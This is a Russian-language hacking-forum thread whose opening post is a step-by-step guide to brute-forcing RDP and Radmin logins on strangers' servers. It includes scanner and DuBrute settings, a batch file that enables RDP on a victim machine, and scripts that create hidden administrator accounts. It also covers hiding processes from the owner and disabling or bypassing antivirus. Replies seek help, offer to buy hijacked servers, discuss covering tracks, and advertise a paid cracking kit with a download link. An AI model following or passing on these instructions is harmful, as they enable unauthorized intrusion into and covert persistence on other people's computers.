PDA

Просмотр полной версии : Большой F.A.Q. по брруту дедиков


diki_01
20.01.2013, 22:39
Большой F.A.Q. по бруту дедиков

В этой статье я постараюсь более мение полностью описать весь процес брута дедиков и работу на дедике.

И так приступим:

1.Что такое дедик?

Дедик - пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация

служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.

2.Для чего предназначены дедики?

Дедики можно использовать для абосолютно разных целей например для интернет серфинга, для брута, спама, можно ставить на нем игровые сервера (например я много раз находил на дедиках сервера кс) и т.д.

3.Где достать дедик?

Дедик можно купить, сбрутить или добыть с помощю трояна.


4.Брут дедиков

-Брут RDP

RDP - протокол удалённого рабочего стола.

Для брута RDP нам понадобитса следующие программы DuBrute RC2 (http://vk.cc/1FE0j9)(сам брут)VT (https://www.virustotal.com/file/2d11b735640dfcdb26df0e276281730d7bf5d7573025bfc1d9 d3492b8071ace6/analysis/1358374990/), vnc_scanner_GUI (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/835dd84eed9acff7056ded87d9672d725b915924323b598173 7bd2ed5162efb4/analysis/1358375101/)(сканер портов) и можно еще ipgeobase (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/6f3cc9501d02483eb607069b07d227b599f20208509e88ca46 ad146b052d614c/analysis/1358375200/)(база данных IP адресов). Программы не обязательно эти, можно и другие, но лично я пользуюсь етими.

И так приступим.

1.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса в буфер.

2.Теперь запустите vnc_scanner_GUI и вставте в самое большое поле все ип адреса.

И настроим его так:

http://i.pixs.ru/storage/1/4/8/Bezimyanni_1546530_6844148.jpg

Теперь нажимаем Start Scan и ждем окончания работы.

По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятса все ип адреса с открытым 3389 портом.

3.Запускаем DuBrute RC2 и нажимаем Generation.

Теперь нажимаем File IP и выбираем наш IPs.txt

Нажимаем File Login и выбираем файл с логинами(можно добавить свои) обычно Login.txt

Нажимаем File Pass и выбираем файл с паролями (тоже можете добавить свои) обычно Pass.txt

Нажимаем Make и можем закрывать это окно.

Теперь в папке с брутом в файле source.txt записаны все комбинации ип адресов, логинов и паролей.

Нажимаем Config и Настроим его так:

http://i.pixs.ru/storage/1/6/3/Bezimyanni_9098948_6844163.jpg

Нажимаем OK и все настройка брута закончена, нажимаем старт и ждем окончания работы.

После окончание работы все гуды сохранятса в файле good.txt

Вот и все на етом брут RDP закончен.

-Брут Radmin

1. Сам процес брута

Radmin - программа для удалённого доступа.

Для ее брута нам понадобитса lamescan3_r11 (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/0b9e062e520c94569f6218dfbbbba647f749e367e0b763298b 8876244cce9f71/analysis/1358426990/), ipgeobase (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/6f3cc9501d02483eb607069b07d227b599f20208509e88ca46 ad146b052d614c/analysis/1358375200/) и клент радмина radmin viewer (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/8a5e27c75166805950f19819f8ef7cb34b2b2e466236eed12c c0210ca827e3c6/analysis/1358701363/)

1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное

Настроим его так:

http://s002.radikal.ru/i198/1010/b3/0d8a7a356860.jpg

закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставте все галочки.

Вот так:

http://i.pixs.ru/storage/1/1/8/Bezimyanni_9401858_6844118.jpg

2.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ип адреса и нажимаем Готово.

Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.

После окончания работы можете спокойно подлючатса к хосам к которым подобран пароль.

Вот и все на етом брут Radminа закончен.

2.Что делать дальше?

После того как вы сбрутили несколько радминов нам понадобитса сделать с них дедик т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).

Приступим, включить RDP можно так:

-Щелкаем Правой кнопкой мышки на Мой компютер->Свойства

-Переходим на вкладку "Удалённые сеансы"

-Ставим везде галочки

или с помощю батника:

@Echo off

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Чтобы запустить батник на компютере у жертвы надо с помощю передачи файлов закинуть батник в недры виндовса и подключитса к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat

Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/67a307132cd485bf57d413eb897c83789d0fb05f92e223382d 7e92f78fd221c6/analysis/1357736760/) и перезагрузить компютер, запустить его можно также с использованием командной строки.

Вот и все теперь можете подключитса к компютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.

5.Как создать и скрыть пользователя на дедике?

Не буду розказывать о всех способах создание пользователя т.к. ето замет много времени, розкажу о основных.

1.С помощю Управление компютером

-Щелкаем Правой кнопкой мышки на Мой компютер->Управление

-Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте)

2.С помощю cmd

Включаем cmd и создаем пользователя командами:

net user Имя Пароль/add

net localgroup Група администраторов Имя /add

net localgroup Група пользователей RDP Имя /add

net accounts /maxpwage:unlimited

3.С помощю батника который создает и сразу скрывает пользователя с екрана приветствий

Set AdmGroupSID=S-1-5-32-544

Set AdmGroup=

For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J

Set AdmGroup=%AdmGroup:~0,-1%

net user Имя_пользователя Пароль /add

net localgroup %AdmGroup% Имя_пользователя /add

Set RDPGroupSID=S-1-5-32-555

Set RDPGroup=

For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J

Set RDPGroup=%RDPGroup:~0,-1%

net localgroup "%RDPGroup%" Имя_пользователя /add

net accounts /maxpwage:unlimited

reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v Имя_пользователя /t REG_DWORD /d "00000000" /f

4.С помошю программы DED C14 (http://vk.cc/1FE0j9) vt (https://www.virustotal.com/file/a92ecdae0539d4a47d2dd77c69686199548b9b596fec4549f1 446c19dd0ba3ee/analysis/1357737874/) она создаст и скроет пользователя.

5.Скрыть пользователя.

Вот мы создали пользователя теперь надо скрыть его с екрана приветствия при запуске виндовс и в папке Documents and Settings, на скрытьии в папке останавлеватса не буду надеюсь все это знают.

Чтобы скрыть пользователя в екране приветствия в ветке реестра

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t

нужно создать параметер типа DWORD с именем пользователя и значением 0.

Вот и все тепер на дедике у нас есть свой скрытый пользователь.

6.Как пользоватса дедиком не создавая пользователя(под админом) и не быть замеченым?

Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/3748aaf39f1683e9c2f037037bb6e1fe981cb934eb46ea8d8c 30ba8d3f537ada/analysis/1357737241/), PS Tray Factory (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/e8e54355d2468be1584805b6e3aa2859e937d0f14fb38c3ce7 27d1d03037105f/analysis/1357737486/), DelTrayIcon (http://vk.cc/1FE0j9) VT (https://www.virustotal.com/file/0eedbc3b398ed3ee0c3932be2bf5e1a06f5613617010d078b9 21aa8bdc235f26/analysis/1358432873/).

Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:

- Запускаем PS Tray Factory и в первых двух вкаладках отмечаем приложения которые хотим скрыть и сворачеваим эго(не выключаем). Посе етого действия пропадут окна нашых програм, но останетсу процесы иконка PS Tray Factory.

- Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процесы PS Tray Factory и програм которые мы хотели скрыть.

- Запускаем hidetoolz и на процесах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.

Если вы все сделали правильно то теперь наши программы работают на учетке админа полностю скрыто и он об етом даже не подозревает.

Тепер чтобы увидеть окна вашых програм включите hidetoolz и зделайте все процесы видимыми, убейте в деспетчере задач процес PS Tray Factory, система немного залагает и покажет вам окна всех програм которые вы скрыли.

7.Что делать если антивирус на дедике удаляет ваши программы?

Обяснять для каждого антивируса очень долго но розкажу в общем виде(если что поищите в гугле).

Нужно создать папку гдето в недрах виндовс, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.

Если антивирь не разрешает изменений и просит пароль можем попытатса выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.

8.Что делать если на дедике ScreenLocker?

Как обойти новые локеры я чесно говоря не знаю, но можно попытатса вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процес локера, или вызвать командную строку с помощю [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процес локера, можно попытатса переключитса на другое окно с помощю [Alt]+[Tab] или если есть доступ до файлов с помощю техже команд что написал выше убить процес батником.

9.Как зайти на дедик?

Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроетса окно "Запуск программы" в нем пишем mstsc и нажимаем OK,

откроетса окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ип адрес дедика, для более удобного доступа нажимаем кнопку "Параметры"

и в поле "Пользователь" пишем имя учетки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить,

появитса еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике, чтобы зайти на него еще раз вам просто будет нужно

выбрать ип дедика и нажать Подключить и ваш компютер автоматически введет логин и пароль к пользователю.

Когда вы ето все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике.

10.Как подключить свой локальный диск и буфер обмена к дедику?

Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Лкальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычто диск C ) то можно будет ппередавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь етим потомучто ваш локальный диск будет доступен всем пользователям дедика т.е. админ увиди что подключилса ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоватса дедиком далше.

11.Автоматически запустить свою прогу при входе на дедик

Вы можете запустить свою програму при подключении (обычно программы для сбора информации) для етого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить.

Базы данных ип адресов стран можно найти на сайте www.proxysecurity.com (http://www.proxysecurity.com/ip-address-range.php)

Вот и все на етом моя статья закончена если будут еще какието вопросы или идеи что добавить в статью говорите.

Прошу сильно не ругать это моя первая статья.

Killan
21.01.2013, 00:55
Много конечно тем касаемо дедов, но более полной и понятной не попадалось. Мне нравится)

diki_01
21.01.2013, 01:45
спасибо, можете подсказать как сделать спойлер на етом сайте?

vip@
21.01.2013, 21:05
Можешь патч на мультиюзерность перезалить? Там файл удалён, а искать другие - не все работают на win 7

anti4it
04.02.2013, 12:58
Подскажите как должен выглядеть, source.txt ? Что-то брут ничего не брутит

anti4it
04.02.2013, 13:04
Спасибо, помогло, побаловался немного


Стукни в аську 690-889 готов приобретать дедики в для собственных нужд за небольшую плату

dlavager
04.02.2013, 13:44
причем тут только Радмин мне не понятно,если написал что по Дедикам?

Не чего нового нет,такого везде масса,это для новичков может ,не более того

anti4it
04.02.2013, 13:47
причем тут только Радмин мне не понятно,если написал что по Дедикам?
Не чего нового нет,такого везде масса,это для новичков может ,не более того


радмины брутятся замечательно, а вот с дедиками беда

dlavager
04.02.2013, 13:57
радмины брутятся замечательно, а вот с дедиками беда


Не какой беды нет.просто нужны пасс,нормальные и канал с железом.ну и клиенты

anti4it
04.02.2013, 14:51
Не какой беды нет.просто нужны пасс,нормальные и канал с железом.ну и клиенты


подскажи, плиз какой все-таки должен быть source.txt ?))

dlavager
10.02.2013, 18:33
подскажи, плиз какой все-таки должен быть source.txt ?))


Это все есть в паблике.

Нет я за это беру оплату.Просто так не чего не рассказываю.

Сам обучался платно. Тогда такого не было,как сейчас

VKAPI
01.04.2013, 20:28
Лучше рассказали бы " Что бывает при бруте дедиков"

что будет если брутить с своей машины без маски

Atomikdddsss
01.04.2013, 20:49
Лучше рассказали бы " Что бывает при бруте дедиков"
что будет если брутить с своей машины без маски


У знакомых было вот так:Чувак брутил со своего пк Германию вроде,через пару дней из одного универа Германии пришло письмо провайдеру о прожественных попытках входа (вообщем сказали что атакуют) после чего провайдер отрубил инет пользователю и пригрозил

чуваку что если будет ещё такими делами заниматься то получит по попе и т.п.

Было ещё такое: Чувак с деда брутил РУ и через 3 дня к нему приехали гости,анально наказали и выписали штраф.Но есть знакомы которые уже пару лет Ру брутят и хоть бы хны.

VKAPI
01.04.2013, 21:22
У знакомых было вот так:Чувак брутил со своего пк Германию вроде,через пару дней из одного универа Германии пришло письмо провайдеру о прожественных попытках входа (вообщем сказали что атакуют) после чего провайдер отрубил инет пользователю и пригрозил
чуваку что если будет ещё такими делами заниматься то получит по попе и т.п.
Было ещё такое: Чувак с деда брутил РУ и через 3 дня к нему приехали гости,анально наказали и выписали штраф.Но есть знакомы которые уже пару лет Ру брутят и хоть бы хны.



ну и я думаю) год назад Чекал 3млн мыл. где то 10 дней безпередышки с своего компа и пофег) но сам шугался чуток)

seledkapod
14.05.2013, 00:35
Аффтар обнови ссылки! Пашут только первые три ссылки, по остальным все удалено!

diki_01
19.07.2013, 04:06
немного обновил

Owned777
23.07.2013, 20:21
подскажите где можно взять диапазон Ip?

ZEPHYR
15.09.2013, 15:50
Блин, ну какое удовольствие все это делать под Окнами?

Диапазоны тут (http://www.proxyserverprivacy.com/ipaddress_range.php)

dlavager
17.09.2013, 00:05
Блин, ну какое удовольствие все это делать под Окнами?
Диапазоны тут


такой умный одни мы тут все тупые.

спасибо что подсказал а то не кто не знал.

тебе ещё таких 10 ток дать сайтов умник.

HavingingWor
05.10.2013, 23:07
Почему на ламескане доходит подбор, при стандартных логинах и пасах, до 61% ничего дальше, как исправить?

И как взломать фан сайт MMORPG Легенда Рыцаря (https://knightsfable.ru)?

zeoman
07.10.2013, 03:40
Почему на ламескане доходит подбор, при стандартных логинах и пасах, до 61% ничего дальше, как исправить?


Ограничение на версии 3.х без ограничений брутит как помню версии 2.х

HavingingWor
07.10.2013, 12:43
Бывает такое что у пользователя установлена 3 версия без ограничения? или они все обновились?

zeoman
07.10.2013, 13:03
Бывает такое что у пользователя установлена 3 версия без ограничения? или они все обновились?


3.x все вроде с ограничениями так что брути 2.х

palkinj
26.11.2013, 12:39
Спасибо, отличный F.A.Q

cleric.80
01.12.2013, 17:59
1) где то была статья как скрыть свое присутствие и земетать следы (никак не найду)

2) в ветке

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t

нет раздела - UserList

http://s005.radikal.ru/i212/1312/e2/4af323e9d367.png (http://radikal.ru/fp/2f3173c00e7d4aeda42a2a7a9a92674b)

как быть ?

3) мона ли тут скрыть свою учетку

http://s004.radikal.ru/i208/1312/c8/56718f652186.png (http://radikal.ru/fp/1cfe51ebefe04482a56cbf18a4a4b0d3)

4) что ето за журнал и как его очистить и не палиться впредь ?

http://s020.radikal.ru/i721/1312/44/74efaf24d7e9.png (http://radikal.ru/fp/cba8a8033a9f412680a4752b93ea4c68)

Tauri
12.12.2013, 14:19
Что я делаю не так?

2 года не брутил деды, раньше за ночь 100 штук как покурить.

Сейчас уже 3 день пытаюсь сбрутить и 0 гуд.

Хотел на нг поднять баксов 40 и тут такой облом..

Использую старый проверенный DUBrute 2.1

Что поменялось в этой сфере я не пойму ...

OxoTnik
13.12.2013, 00:15
Что я делаю не так?
2 года не брутил деды, раньше за ночь 100 штук как покурить.
Сейчас уже 3 день пытаюсь сбрутить и 0 гуд.
Хотел на нг поднять баксов 40 и тут такой облом..
Использую старый проверенный DUBrute 2.1
Что поменялось в этой сфере я не пойму ...


пароли. пароли стали жёще

dmg
16.12.2013, 02:56
Что я делаю не так?
2 года не брутил деды, раньше за ночь 100 штук как покурить.
Сейчас уже 3 день пытаюсь сбрутить и 0 гуд.
Хотел на нг поднять баксов 40 и тут такой облом..
Использую старый проверенный DUBrute 2.1
Что поменялось в этой сфере я не пойму ...


ник основного акка случайно не xEK был?)

comynicator
17.01.2014, 16:52
Ссылки-гамно!

По ссылкам инжектор.ехе И какой то лоад мани.Перезалейте!

Zordor
14.08.2017, 17:47
Брут дедиков Soft+Manual 2017 (Скачать с Яндекс диска)

http://s02.radikal.ru/i175/1708/47/a8fd0a6b2bda.jpg

Данный мануал покупали за 2000р.

Мануал полностью описан от А до Я.

Скрины по настройке.

Ссылки дя парсинга стран IP

Софт 32x64x. База логинов и паролей.

Рекомендация:

Много паролей в папку с паролями не закидывайте.

Мы будем брать колличеством. За ночь будет около 60 000 дедов для брута.

Из них по нашей базе вы 20-30 дедиков сбрутите.

У меня выходит около 30 дедов за ночь.

Также можете потом брутить на сбрученных дедиках новые дедики.

Также с софтом идет дополнительный софт. Сканер логов с других дедов.

Которые пытаються сбрутить ваш дед. И тем самым начинает брутить все дедики которые хотят вас сбрутить.

Софт на данный момент актуален и будет еще долго актуальным. И рабочий. Качайте. И не забывайте про ++++++++

Скачать: https://yadi.sk/d/7p92yX8q3Lx5T5